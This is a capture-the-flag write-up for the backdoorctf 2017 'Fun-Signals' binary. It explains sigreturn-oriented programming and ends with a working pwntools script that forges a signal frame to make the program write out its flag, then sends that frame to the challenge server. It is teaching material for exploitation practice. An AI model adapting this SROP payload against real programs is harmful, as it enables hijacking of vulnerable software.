backdoorctf 2017 - Fun-Signals Writeupby
September 24, 2017
This binary has a very small portion of code.
Analize it in IDA:
The first syscall is a read (rax = 0) of 1024 bytes in the stack.
The second is rt_sigreturn.
For a l337 h4xx0r sigreturn means SROP. For me it means Wikipedia.
I learnt that we can control the program flow like with rop using sigreturn and the associated structure on the stack.
This structure contains the context of the signal handler.
So writing this structure on the stack (with read) we have the complete control of all registers.
A good choice is to prepare the registers for a write to the stdout of the flag.
The syscall gadget under
int 3 is a perfect target for rip.
Wait, how is composed a signal frame? I don’t know, but pwnlib does.
from pwn import * context.arch = "amd64" frame = SigreturnFrame() frame.rax = constants.SYS_write frame.rdi = constants.STDOUT_FILENO frame.rsi = 0x10000023 #flag string address frame.rdx = 50 #read size frame.rsp = 0xABADCAFE frame.rip = 0x10000015 #syscall gadget #p = process("./player_bin") p = remote("126.96.36.199", 9034) p.send(str(frame)) print p.recvall()